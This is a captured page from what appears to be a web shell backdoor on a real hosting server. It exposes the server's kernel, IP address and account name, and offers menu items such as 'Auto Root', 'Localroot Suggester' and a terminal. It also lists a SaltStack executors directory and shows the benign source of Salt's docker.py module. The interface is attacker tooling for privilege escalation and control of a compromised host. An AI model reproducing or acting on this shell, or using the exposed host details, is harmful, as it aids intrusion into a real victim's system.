Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.6 /
site-packages /
salt /
executors /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2022-10-11 05:09
__init__.py
28
B
-rw-r--r--
2022-05-16 09:16
direct_call.py
185
B
-rw-r--r--
2022-05-16 09:16
docker.py
1.42
KB
-rw-r--r--
2022-05-16 09:16
splay.py
2.35
KB
-rw-r--r--
2022-05-16 09:16
sudo.py
1.81
KB
-rw-r--r--
2022-05-16 09:16
transactional_update.py
3.67
KB
-rw-r--r--
2022-05-16 09:16
Save
Rename
""" Docker executor module .. versionadded:: 2019.2.0 Used with the docker proxy minion. """ __virtualname__ = "docker" DOCKER_MOD_MAP = { "state.sls": "docker.sls", "state.apply": "docker.apply", "state.highstate": "docker.highstate", } def __virtual__(): if "proxy" not in __opts__: return ( False, "Docker executor is only meant to be used with Docker Proxy Minions", ) if __opts__.get("proxy", {}).get("proxytype") != __virtualname__: return False, "Proxytype does not match: {}".format(__virtualname__) return True def execute(opts, data, func, args, kwargs): """ Directly calls the given function with arguments """ if data["fun"] == "saltutil.find_job": return __executors__["direct_call.execute"](opts, data, func, args, kwargs) if data["fun"] in DOCKER_MOD_MAP: return __executors__["direct_call.execute"]( opts, data, __salt__[DOCKER_MOD_MAP[data["fun"]]], [opts["proxy"]["name"]] + args, kwargs, ) return __salt__["docker.call"](opts["proxy"]["name"], data["fun"], *args, **kwargs) def allow_missing_func(function): # pylint: disable=unused-argument """ Allow all calls to be passed through to docker container. The docker call will use direct_call, which will return back if the module was unable to be run. """ return True